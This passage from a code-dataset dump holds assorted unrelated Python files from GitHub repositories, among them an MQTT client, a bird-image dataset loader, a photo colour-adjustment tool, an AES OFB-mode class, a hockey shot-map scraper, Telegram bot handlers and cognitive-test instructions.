paho.mqtt.client as mqtt\nimport threading\nimport time\nimport numpy as np\n\n# for plot\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nis_connected_to_broker = False\ntemperature = 0\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n global is_connected_to_broker\n print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe((\"mydome/#\", 2))\n client.subscribe((\"dcsquare/#\", 0))\n client.subscribe((\"lotik/test\", 0))\n\n if rc == 0:\n is_connected_to_broker = True\n timer_callback()\n\n# callback for when client is disconnected\ndef on_disconnect(client, userdata, rc):\n print(\"Connection returned result:\"+str(rc))\n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n global temperature\n print(msg.topic+\" \"+str(msg.payload))\n\n if msg.topic == \"mydome/temp/value\":\n temperature = msg.payload\n\n# 1 second timer callback\ndef timer_callback():\n threading.Timer(1.0, timer_callback).start()\n\n if is_connected_to_broker == True:\n client.publish(\"lotik/test\", time.time())\n\n # 
for plot\n for i in range(10):\n y = np.random.random()\n plt.scatter(i, y)\n plt.pause(0.05)\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_disconnect = on_disconnect\n\nclient.connect(\"broker.mqttdashboard.com\", 1883, 60)\n\n# for plots\nplt.axis([0, 10, 0, 1])\nplt.ion()\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\nprint(\"Starting the loop..\")\nclient.loop_forever(timeout=1.0)\n","repo_name":"dhavalhparikh/fun-hobby-projects","sub_path":"python-mqtt-client/mqtt_client_try.py","file_name":"mqtt_client_try.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70256599768","text":"from selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef wait_element(driver, by_content, by=By.XPATH, timeout=8):\n try:\n element_present = EC.presence_of_element_located((by, by_content))\n WebDriverWait(driver, timeout).until(element_present)\n except TimeoutException:\n print(\"Timed out waiting for page to load\")\n return False\n return True\n\n\ndef remove_element(driver, element):\n driver.execute_script(\"\"\"\n var element = arguments[0];\n element.parentNode.removeChild(element);\n \"\"\", element)","repo_name":"alexlopespereira/enapespcd2021","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"44020244657","text":"import numpy as np\nimport os\nimport pandas as pd\nfrom torchvision.datasets.folder import default_loader\nfrom torchvision.datasets.utils import download_url\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.transforms import transforms\n\n\nclass Cub2011(Dataset):\n base_folder = 'CUB_200_2011/images'\n url = 'https://data.caltech.edu/records/65de6-vp158/files/CUB_200_2011.tgz'\n filename = 'CUB_200_2011.tgz'\n tgz_md5 = '97eceeb196236b17998738112f37df78'\n\n def __init__(self, root, train=True, transform=None, loader=default_loader, download=False):\n self.root = os.path.expanduser(root)\n self.transform = transform\n self.loader = default_loader\n self.train = train\n\n if download:\n self._download()\n\n if not self._check_integrity():\n raise RuntimeError('Dataset not found or corrupted.' 
+\n ' You can use download=True to download it')\n\n def _load_metadata(self):\n images = pd.read_csv(os.path.join(self.root, 'CUB_200_2011', 'images.txt'), sep=' ',\n names=['img_id', 'filepath'])\n image_class_labels = pd.read_csv(os.path.join(self.root, 'CUB_200_2011', 'image_class_labels.txt'),\n sep=' ', names=['img_id', 'target'])\n train_test_split = pd.read_csv(os.path.join(self.root, 'CUB_200_2011', 'train_test_split.txt'),\n sep=' ', names=['img_id', 'is_training_img'])\n\n data = images.merge(image_class_labels, on='img_id')\n self.data = data.merge(train_test_split, on='img_id')\n\n if self.train:\n self.targets = self.data.target[self.data.is_training_img == 1]\n self.data = self.data.filepath[self.data.is_training_img == 1]\n else:\n self.targets = self.data.target[self.data.is_training_img == 0]\n self.data = self.data.filepath[self.data.is_training_img == 0]\n \n self.targets = self.targets.to_numpy()-1\n self.classes = {}\n for filepath in self.data:\n class_id, class_name = filepath.split('/')[0].split('.')\n class_id = int(class_id)\n self.classes[class_id] = class_name\n self.classes = [self.classes[i] for i in range(1, len(self.classes)+1)]\n self.data = np.array([os.path.join(self.root, self.base_folder, path) for path in self.data])\n\n def _check_integrity(self):\n try:\n self._load_metadata()\n except Exception:\n return False\n\n for filepath in self.data:\n if not os.path.isfile(filepath):\n return False\n return True\n\n def _download(self):\n import tarfile\n\n if self._check_integrity():\n print('Files already downloaded and verified')\n return\n\n download_url(self.url, self.root, self.filename, self.tgz_md5)\n\n with tarfile.open(os.path.join(self.root, self.filename), \"r:gz\") as tar:\n tar.extractall(path=self.root)\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n path = self.data[idx]\n target = self.targets[idx]\n img = self.loader(path)\n\n if self.transform is not None:\n img = self.transform(img)\n\n return img, target\n\nif __name__ == '__main__':\n transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406], [0.229,0.224,0.225]),\n ])\n\n cub = Cub2011('data/', transform=transform)\n print(cub.classes)\n input(\"\")\n","repo_name":"eric11220/pretrained-models-in-CL","sub_path":"continuum/dataset_scripts/cub2011.py","file_name":"cub2011.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"31"} +{"seq_id":"11594936326","text":"import cv2\nimport numpy\n\nimport Tool\n\nclass Colours(Tool.Tool):\n def on_init(self):\n self.id = \"colours\"\n self.name = \"Colours\"\n self.icon_path = \"ui/PF2_Icons/Colours.png\"\n self.properties = [\n Tool.Property(\"header\", \"Colours\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"overall_saturation\", \"Saturation\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"hue\", \"Hue\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"kelvin\", \"Colour Temperature\", \"Slider\", 6500, max=15000, min=1000),\n Tool.Property(\"header_ts\", \"Tonal Saturation\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"highlight_saturation\", \"Highlight Saturation\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"midtone_saturation\", \"Midtone Saturation\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"shadow_saturation\", \"Shadow Saturation\", \"Slider\", 0, max=50, 
min=-50),\n # Red\n Tool.Property(\"header_red\", \"Red\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"red_overall_brightness\", \"Overall Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"red_highlight_brightness\", \"Highlight Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"red_midtone_brightness\", \"Midtone Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"red_shadow_brightness\", \"Shadow Brightness\", \"Slider\", 0, max=50, min=-50),\n # Green\n Tool.Property(\"header_green\", \"Green\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"green_overall_brightness\", \"Overall Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"green_highlight_brightness\", \"Highlight Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"green_midtone_brightness\", \"Midtone Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"green_shadow_brightness\", \"Shadow Brightness\", \"Slider\", 0, max=50, min=-50),\n # Blue\n Tool.Property(\"header_blue\", \"Blue\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"blue_overall_brightness\", \"Overall Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"blue_highlight_brightness\", \"Highlight Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"blue_midtone_brightness\", \"Midtone Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"blue_shadow_brightness\", \"Shadow Brightness\", \"Slider\", 0, max=50, min=-50),\n # Bleed\n Tool.Property(\"header_bleed\", \"Tonal Bleed\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"highlight_bleed\", \"Highlight Bleed\", \"Slider\", 0.5, max=1, min=0.001),\n Tool.Property(\"midtone_bleed\", \"Midtone Bleed\", \"Slider\", 0.5, max=1, min=0.001),\n Tool.Property(\"shadow_bleed\", \"Shadow Bleed\", \"Slider\", 0.5, max=1, min=0.001),\n ]\n\n def on_update(self, image):\n if(not self.is_default()):\n im = image\n hue = self.props[\"hue\"].get_value()\n saturation = self.props[\"overall_saturation\"].get_value()\n ct = self.props[\"kelvin\"].get_value()/100.0\n hs = self.props[\"highlight_saturation\"].get_value()\n ms = self.props[\"midtone_saturation\"].get_value()\n ss = self.props[\"shadow_saturation\"].get_value()\n rob = self.props[\"red_overall_brightness\"].get_value()\n rhb = self.props[\"red_highlight_brightness\"].get_value()\n rmb = self.props[\"red_midtone_brightness\"].get_value()\n rsb = self.props[\"red_shadow_brightness\"].get_value()\n gob = self.props[\"green_overall_brightness\"].get_value()\n ghb = self.props[\"green_highlight_brightness\"].get_value()\n gmb = self.props[\"green_midtone_brightness\"].get_value()\n gsb = self.props[\"green_shadow_brightness\"].get_value()\n bob = self.props[\"blue_overall_brightness\"].get_value()\n bhb = self.props[\"blue_highlight_brightness\"].get_value()\n bmb = self.props[\"blue_midtone_brightness\"].get_value()\n bsb = self.props[\"blue_shadow_brightness\"].get_value()\n chbl = self.props[\"highlight_bleed\"].get_value()\n cmbl = self.props[\"midtone_bleed\"].get_value()\n csbl = self.props[\"shadow_bleed\"].get_value()\n\n bpp = float(str(im.dtype).replace(\"uint\", \"\").replace(\"float\", \"\"))\n np = float(2 ** bpp - 1)\n\n out = im.astype(numpy.float32)\n isHr = self._is_highlight(out, (3.00 / chbl))\n isMr = self._is_midtone(out, (3.00 / cmbl))\n isSr = self._is_shadow(out, (3.00 / csbl))\n\n # Colour Temperature\n if(int(ct) != 65):\n r = 0\n 
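# --- Editor's aside (illustration only, not part of the dataset records around it) ---
# The colour-temperature branch around this point is the familiar piecewise pow/log fit
# of black-body colour (ct = kelvin/100, channels clamped to 0..255); the record then
# divides each channel by 255 to get per-channel multipliers. A compact standalone
# version of the same approximation, using the record's constants:
import math
def kelvin_to_rgb(kelvin):
    ct = kelvin / 100.0
    r = 255.0 if ct <= 66 else 329.698727446 * (ct - 60) ** -0.1332047592
    g = (99.4708025861 * math.log(ct) - 161.1195681661 if ct <= 66
         else 288.1221695283 * (ct - 60) ** -0.0755148492)
    b = 255.0 if ct >= 66 else (0.0 if ct <= 19
                                else 138.5177312231 * math.log(ct - 10) - 305.0447927307)
    clamp = lambda v: max(0.0, min(255.0, v))
    return clamp(r), clamp(g), clamp(b)
print(kelvin_to_rgb(6500))  # close to neutral white, roughly (255, 254, 250)
# --- end aside ---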
if(ct <= 66):\n print(ct <= 66)\n r = 255\n else:\n r = ct - 60\n r = 329.698727446 * numpy.math.pow(r, -0.1332047592)\n if(r < 0):\n r = 0\n if(r > 255):\n r = 255\n\n g = 0\n if(ct <= 66):\n g = ct\n g = 99.4708025861 * numpy.math.log(g) - 161.1195681661\n if (g < 0):\n g = 0\n if (g > 255):\n g = 255\n else:\n g = ct - 60\n g = 288.1221695283 * numpy.math.pow(g, -0.0755148492)\n if (g < 0):\n g = 0\n if (g > 255):\n g = 255\n\n\n b = 0\n if(ct >= 66):\n b = 255\n elif(ct <= 19):\n b = 0\n else:\n b = ct - 10\n b = 138.5177312231 * numpy.math.log(b) - 305.0447927307\n if (b < 0):\n b = 0\n if (b > 255):\n b = 255\n\n r = (r/255.0)\n g = (g / 255.0)\n b = (b / 255.0)\n\n # Red\n out[0:, 0:, 2] = out[0:, 0:, 2] * r\n # Green\n out[0:, 0:, 1] = out[0:, 0:, 1] * g\n # Blue\n out[0:, 0:, 0] = out[0:, 0:, 0] * b\n\n\n\n #Converting to HSV\n\n out = cv2.cvtColor(out, cv2.COLOR_BGR2HSV)\n\n #Hue...\n if (hue != 0.0):\n out[0:, 0:, 0] = out[0:, 0:, 0] + (hue / 100.0) * 255\n\n #Saturation...\n if (saturation != 0.0):\n out[0:, 0:, 1] = out[0:, 0:, 1] + (saturation / 10000.0) * 255\n\n #Saturation Highlights...\n if (hs != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((hs * isHr[0:, 0:, 1]) / 10000.0) * 255)\n\n #Saturation Midtones...\n if (ms != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((ms * isMr[0:, 0:, 1]) / 10000.0) * 255)\n\n #Saturation Shadows...\n if (ss != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((ss * isSr[0:, 0:, 1]) / 10000.0) * 255)\n\n out[out < 0.0] = 0.0\n out[out > 4294967296.0] = 4294967296.0\n\n out = cv2.cvtColor(out, cv2.COLOR_HSV2BGR)\n\n #Red...\n if (rob != 0.0):\n out[0:, 0:, 2] = out[0:, 0:, 2] + (rob / 100.0) * np\n\n # Highlights\n if (rhb != 0.0):\n out[0:, 0:, 2] = (out[0:, 0:, 2] + ((rhb * isHr[0:, 0:, 1]) / 100.0) * np)\n\n # Midtones\n if (rmb != 0.0):\n out[0:, 0:, 2] = (out[0:, 0:, 2] + ((rmb * isMr[0:, 0:, 1]) / 100.0) * np)\n\n # Shadows\n if (rsb != 0.0):\n out[0:, 0:, 2] = (out[0:, 0:, 2] + ((rsb * isSr[0:, 0:, 1]) / 100.0) * np)\n\n #Green...\n if (gob != 0.0):\n out[0:, 0:, 1] = out[0:, 0:, 1] + (gob / 100.0) * np\n\n # Highlights\n if (ghb != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((ghb * isHr[0:, 0:, 1]) / 100.0) * np)\n\n # Midtones\n if (gmb != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((gmb * isMr[0:, 0:, 1]) / 100.0) * np)\n\n # Shadows\n if (gsb != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((gsb * isSr[0:, 0:, 1]) / 100.0) * np)\n\n #Blue...\n if (bob != 0.0):\n out[0:, 0:, 0] = out[0:, 0:, 0] + (bob / 100.0) * np\n\n # Highlights\n if (bhb != 0.0):\n out[0:, 0:, 0] = (out[0:, 0:, 0] + ((bhb * isHr[0:, 0:, 1]) / 100.0) * np)\n\n # Midtones\n if (bmb != 0.0):\n out[0:, 0:, 0] = (out[0:, 0:, 0] + ((bmb * isMr[0:, 0:, 1]) / 100.0) * np)\n\n # Shadows\n if (bsb != 0.0):\n out[0:, 0:, 0] = (out[0:, 0:, 0] + ((bsb * isSr[0:, 0:, 1]) / 100.0) * np)\n\n\n out[out < 0.0] = 0.0\n out[out > np] = np\n return out.astype(im.dtype)\n else:\n return image\n\n def _is_highlight(self, image, bleed_value = 6.0):\n bleed = float(image.max() / bleed_value)\n mif = image.max() / 3.0 * 2.0\n icopy = image.copy()\n\n icopy[icopy < mif - bleed] = 0.0\n icopy[(icopy < mif) * (icopy != 0.0)] = ((mif - (icopy[(icopy < mif) * (icopy != 0.0)])) / bleed) * -1 + 1\n icopy[icopy >= mif] = 1.0\n return icopy\n\n def _is_midtone(self, image, bleed_value = 6.0):\n bleed = float(image.max() / bleed_value)\n mif = image.max() / 3.0\n mir = image.max() / 3.0 * 2.0\n icopy = image.copy()\n\n icopy[icopy < mif - bleed] = 0.0\n icopy[icopy > mir + bleed] = 0.0\n\n icopy[(icopy < 
mif) * (icopy != 0.0)] = ((mif - (icopy[(icopy < mif) * (icopy != 0.0)])) / bleed) * -1 + 1\n icopy[(icopy > mir) * (icopy != 0.0)] = (((icopy[(icopy > mir) * (icopy != 0.0)]) - mir) / bleed) * -1 + 1\n icopy[(icopy >= mif) * (icopy <= mir)] = 1.0\n return icopy\n\n def _is_shadow(self, image, bleed_value=6.0):\n bleed = float(image.max() / bleed_value)\n mir = image.max() / 3.0\n icopy = image.copy()\n\n icopy[icopy <= mir] = 1.0\n icopy[icopy > mir + bleed] = 0.0\n icopy[icopy > mir] = (((icopy[(icopy > mir) * (icopy != 0.0)]) - mir) / bleed) * -1 + 1\n return icopy\n","repo_name":"Tilo15/PhotoFiddle2","sub_path":"PF2/Tools/Colours.py","file_name":"Colours.py","file_ext":"py","file_size_in_byte":10640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13408477921","text":"from lib389._constants import *\nfrom lib389 import DirSrv, Entry\nimport pytest\nfrom lib389.utils import ensure_bytes, ensure_str\n\nfrom lib389.mappingTree import MappingTrees, MappingTree\n\nimport sys\nMAJOR, MINOR, _, _, _ = sys.version_info\n\nINSTANCE_PORT = 54321\nINSTANCE_SERVERID = 'standalone'\n\nDEBUGGING = True\n\nclass TopologyStandalone(object):\n def __init__(self, standalone):\n standalone.open()\n self.standalone = standalone\n\n\n@pytest.fixture(scope=\"module\")\ndef topology(request):\n standalone = DirSrv(verbose=DEBUGGING)\n standalone.log.debug(\"Instance allocated\")\n args = {SER_HOST: LOCALHOST,\n SER_PORT: INSTANCE_PORT,\n # SER_DEPLOYED_DIR: INSTANCE_PREFIX,\n SER_SERVERID_PROP: INSTANCE_SERVERID}\n standalone.allocate(args)\n if standalone.exists():\n standalone.delete()\n standalone.create()\n standalone.open()\n\n def fin():\n if not DEBUGGING:\n standalone.delete()\n request.addfinalizer(fin)\n\n return TopologyStandalone(standalone)\n\ndef test_mappingtree(topology):\n\n mts = MappingTrees(topology.standalone)\n mt = mts.create(properties={\n 'cn': [\"dc=newexample,dc=com\",],\n 'nsslapd-state' : 'backend',\n 'nsslapd-backend' : 'someRoot',\n })\n\n rmt = mts.get('someRoot')\n rmt.delete()\n\n\n\n","repo_name":"389ds/389-ds-base","sub_path":"src/lib389/lib389/tests/mappingtree_test.py","file_name":"mappingtree_test.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"17433476497","text":"import helperclass as hc\nimport copy\nfrom aes import AES\nfrom aes_keygen import aes_keygen\n\nclass OFB:\n def __init__(self, initialisation, key=None, block_length=128) -> None:\n self.key = key\n self.block_length = block_length\n if key is None:\n self.key = aes_keygen(hc.read_key_from_file(\"key.txt\"))\n hc.check_aes_key(self.key, self.block_length)\n \n self.aes = AES()\n self.iv = initialisation\n if len(self.iv) != self.block_length:\n raise Exception(\"Wrong length of initialisation vector! 
It has to be \" + str(self.block_length) + \" but is \" + str(len(self.iv)))\n\n def get_blocks_of_bit_string(self, bit_string):\n return [bit_string[i:i+self.block_length] for i in range(0, len(bit_string), self.block_length)]\n \n def encrypt_text(self, plain_text): \n bit_content = hc.text_to_bit_string(plain_text)\n bit_blocks = self.get_blocks_of_bit_string(bit_content)\n while len(bit_blocks[-1]) < self.block_length:\n bit_blocks[-1] += \"0\"\n \n encryption = \"\"\n last_bit_string = self.iv\n\n for block in bit_blocks:\n res, new_last_bit_string = self.encrypt_block(block, last_bit_string)\n encryption += res\n last_bit_string = new_last_bit_string\n\n return hc.bit_string_to_text(encryption)\n\n def encrypt_block(self, bit_string, last_bit_string):\n # 1. normal encode using the key and the last bit string\n tmp_result = copy.deepcopy(last_bit_string)\n tmp_result = self.aes.encrypt(tmp_result, self.key)\n\n # 2. add tmp_result and the plaintext\n # new_bit_string = \"\"\n # for i in range(self.block_length):\n # new_bit_string += str(int(bit_string[i]) ^ int(tmp_result[i]))\n return hc.xor_add(bit_string, tmp_result), tmp_result\n\n def decrypt_text(self, cipher_text):\n return self.encrypt_text(cipher_text)\n\n\nif __name__ == \"__main__\":\n iv = \"0\" * 128\n\n ofb = OFB(iv)\n\n enc = ofb.encrypt_text(\"Hallo Welt!asdasdd\")\n print(enc)\n\n dec = ofb.decrypt_text(enc)\n print(dec)\n","repo_name":"Hanno1/KryptologieLab","sub_path":"03_betriebsmodi/krypto_ofb_main.py","file_name":"krypto_ofb_main.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27488941204","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 26 16:45:09 2020\n\n@author: ncalvertuk\n\"\"\"\n\nimport re\nimport requests\nimport time\n\nfixtures_url = \"https://www.eliteleague.co.uk/schedule?id_season=2&id_team=0&id_month=999\"\nfixtures_http = requests.get(fixtures_url)\nidxs = [m.start() for m in re.finditer(\"a href=\\\"/game/\", fixtures_http.text)]\ngame_ids = []\nfor ind in idxs:\n ind1 = fixtures_http.text.find(\" class\",ind)\n g_id = fixtures_http.text[ind+8:ind1-1]\n \n track_url = \"https://www.eliteleague.co.uk\" +g_id + \"/tracking\"\n track_http = requests.get(track_url)\n ind2 = track_http.text.find(\"https://eihl.hokejovyzapis.cz/visualization/\")\n ind3 = track_http.text.find(\"\\\"\",ind2)\n s_id = track_http.text[(ind3-4):ind3]\n if(s_id[0] == \"=\"):\n s_id = s_id[1:]\n print(g_id)\n print(s_id)\n if s_id not in game_ids:\n game_ids.append(int(s_id))\n json_url = \"https://s3-eu-west-1.amazonaws.com/eihl.hokejovyzapis.cz/visualization/shots/\" + str(s_id) + \".json\"\n txt = requests.get(json_url).text\n file_name = str(s_id) + \".json\"\n with open(file_name, 'w') as f:\n f.write(txt)\n time.sleep(10)\n\n \n","repo_name":"ncalvertuk/EIHLShots","sub_path":"GetShotMaps.py","file_name":"GetShotMaps.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38575959041","text":"# URI 1043\n# CLEVERSON MENDES FARIA\n\nmedidas = input().split()\n\na = float(medidas[0])\nb = float(medidas[1])\nc = float(medidas[2])\n\nif (a < b + c) and (b < a + c) and (c < a + b):\n perimetro = a+b+c\n print(\"Perimetro = %.1f\" %perimetro)\nelse:\n area = ((a + b) / 2)*c\n print(\"Area = %.1f\" %area)\n","repo_name":"clemendes/Python","sub_path":"PYTHON-URI/1043 - 
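Because the OFB keystream above is produced by repeatedly encrypting the feedback value and never depends on the data, decryption is the same operation as encryption, which is why decrypt_text simply calls encrypt_text. A generic byte-oriented sketch of that structure; encrypt_block is a stand-in for the AES call and all names here are illustrative:

def ofb_keystream_xor(data_blocks, iv, encrypt_block):
    # encrypt_block: E_K over one block; the keystream is E(IV), E(E(IV)), ...
    out = []
    feedback = iv
    for block in data_blocks:
        feedback = encrypt_block(feedback)  # next keystream block
        out.append(bytes(p ^ k for p, k in zip(block, feedback)))
    return out

Applying it twice with the same iv and cipher recovers the input, since p ^ k ^ k == p.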
Triângulo.py","file_name":"1043 - Triângulo.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4195773821","text":"from tgbot.models import db\nfrom tgbot.utils import buttons\nfrom tgbot import config\n\n\ndef vendor_purchase_orders(call, bot):\n chat_id = call.message.chat.id\n user_id = call.from_user.id\n message_id = call.message.message_id\n user = db.get_user(user_id)\n products = db.get_products_by_vendor(vendor_id=user_id)\n media, keyboard = buttons.all_products_markup(products, user)\n bot.edit_message_media(\n chat_id=chat_id,\n message_id=message_id,\n media=media,\n reply_markup=keyboard,\n )\n\n\ndef view_purchase(call, bot):\n chat_id = call.message.chat.id\n user_id = call.from_user.id\n purchase_id = call.data.split(\":\")[1]\n purchase = db.get_purchase_by_id(purchase_id)\n user = db.get_user(user_id)\n if purchase == None:\n return bot.delete_message(chat_id=chat_id, message_id=call.message.message_id)\n message_text, keyboard = buttons.view_purchase_markup(\n purchase, user)\n bot.send_message(\n chat_id=chat_id,\n text=message_text,\n parse_mode=\"HTML\",\n reply_markup=keyboard,\n )\n","repo_name":"richardunn/tg_marketplace","sub_path":"tgbot/handlers/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26107685295","text":"from typing import Iterable, Tuple, Union\n\nfrom albumentations.augmentations.transforms import RandomBrightnessContrast as RandomBrightnessContrastAlb\n\nfrom fastestimator.op.numpyop.univariate.univariate import ImageOnlyAlbumentation\nfrom fastestimator.util.traceability_util import traceable\n\n\n@traceable()\nclass RandomBrightnessContrast(ImageOnlyAlbumentation):\n \"\"\"Randomly change the brightness and contrast of an image.\n\n Args:\n inputs: Key(s) of images to be modified.\n outputs: Key(s) into which to write the modified images.\n mode: What mode(s) to execute this Op in. For example, \"train\", \"eval\", \"test\", or \"infer\". To execute\n regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument\n like \"!infer\" or \"!train\".\n ds_id: What dataset id(s) to execute this Op in. To execute regardless of ds_id, pass None. 
To execute in all\n ds_ids except for a particular one, you can pass an argument like \"!ds1\".\n brightness_limit: Factor range for changing brightness.\n If limit is a single float, the range will be (-limit, limit).\n contrast_limit: Factor range for changing contrast.\n If limit is a single float, the range will be (-limit, limit).\n brightness_by_max: If True adjust contrast by image dtype maximum, else adjust contrast by image mean.\n\n Image types:\n uint8, float32\n \"\"\"\n def __init__(self,\n inputs: Union[str, Iterable[str]],\n outputs: Union[str, Iterable[str]],\n mode: Union[None, str, Iterable[str]] = None,\n ds_id: Union[None, str, Iterable[str]] = None,\n brightness_limit: Union[float, Tuple[float, float]] = 0.2,\n contrast_limit: Union[float, Tuple[float, float]] = 0.2,\n brightness_by_max: bool = True):\n super().__init__(\n RandomBrightnessContrastAlb(brightness_limit=brightness_limit,\n contrast_limit=contrast_limit,\n brightness_by_max=brightness_by_max,\n always_apply=True),\n inputs=inputs,\n outputs=outputs,\n mode=mode,\n ds_id=ds_id)\n","repo_name":"fastestimator/fastestimator","sub_path":"fastestimator/op/numpyop/univariate/random_brightness_contrast.py","file_name":"random_brightness_contrast.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"18554531311","text":"instr = [\n \"\"\"Verbal fluency\n \nThis test requires that the experimenter operates the\ncomputer. Please allow them to take over now.\"\"\",\n \"\"\"Say this:\n\n\"I'm going to say a letter from the alphabet. When I say begin, I want you to tell me as\nmany words as you can that begin with that letter. You will have 60 seconds before I\ntell you to stop. None of the words can be names of people, or places, or numbers. For\nexample, if I gave you the letter T, you could say take, toy, tooth, and so forth, but\nyou should not say Tom because that is a person's name, you should not say Texas because\nthat is the name of a place, and you should not say twelve because that is a number.\nAlso, do not give me the same word with different endings. For example, if you say take,\nyou should not also say takes and taking. Do you have any questions?\"\n\nIf during the trial the subject fails to make a response for 15 seconds, say: \"Keep\ngoing\". Provide this prompt only once per trial. If the subject generates 3 consecutive\nwords that do not start with the designated letter, say, \"The letter we are using now is \n__\" Provide this prompt only once per trial.\n\nThen say this:\n\n\"The first letter is F. Ready? Begin\"\n\"\"\",\n \"\"\"Say this:\n\n\"The next letter is A. Ready? Begin\"\n\"\"\",\n \"\"\"Say this:\n\n\"The next letter is S. Ready? Begin\"\n\"\"\",\n \"\"\"Say this:\n\n\"Now we are going to do something a little different. This time, I want you to tell me\nas many animals as you can. It doesn't matter what letter they start with. You will\nhave 60 seconds before I tell you to stop. Do you have any questions? Ready? Begin.\"\n\"\"\",\n 'Begin trial',\n 'Response options:',\n 'Valid response',\n 'Invalid response',\n 'No. 
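A usage sketch for the wrapper defined above; the keys and the "train" mode are hypothetical, but each constructor argument comes from the signature shown:

aug = RandomBrightnessContrast(
    inputs="x",                  # hypothetical pipeline key
    outputs="x_aug",             # hypothetical output key
    mode="train",                # only apply during training
    brightness_limit=0.2,        # +/- 20% brightness
    contrast_limit=(-0.1, 0.3),  # asymmetric contrast range
)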
of responses recorded:',\n 'Countdown:',\n 'Pause trial',\n 'Continue trial',\n 'End trial',\n 'Begin/Pause/Continue/End trial:',\n 'End trial now',\n]\n","repo_name":"sammosummo/Charlie2","sub_path":"charlie2/instructions/en/verbalfluency.py","file_name":"verbalfluency.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"40914499946","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport utilities as utl\nfrom paraCP import paraCP\n\n\ndef pruning_step(n, k, a, b, former_T_hat, T_opt, lst_z_opt):\n \"\"\"\n Compute the rightmost set of the equation above\n former_T_hat: corresponds to \\bar{\\mathcal T}_{k, n-1} above\n T_opt, lst_z_opt: describe L^{opt}_{k-1, n-1}\n \"\"\"\n\n assert utl.isCPvector(former_T_hat, n - 1, k)\n assert utl.isCPvector(T_opt, n - 1, k - 1)\n assert len(lst_z_opt) == len(T_opt)\n\n lst_z = lst_z_opt + [float(\"inf\")]\n\n qfs = np.stack([utl.get_QF(n, k, a, b, tau) for tau in former_T_hat], axis=0)\n\n # Init at -infty\n qf_opt = utl.get_QF(n, k - 1, a, b, T_opt[0])\n assert lst_z[0] == -float(\"inf\")\n # These qfs satisfy the 'non-pruning' condition at - infty\n keep = utl.is_lex_leq(utl.invert_deg_one(qfs), utl.invert_deg_one(qf_opt))\n\n for beg, end, t in zip(lst_z[:-1], lst_z[1:], T_opt):\n # Induction hypothesis:\n # the qfs in ~keep were 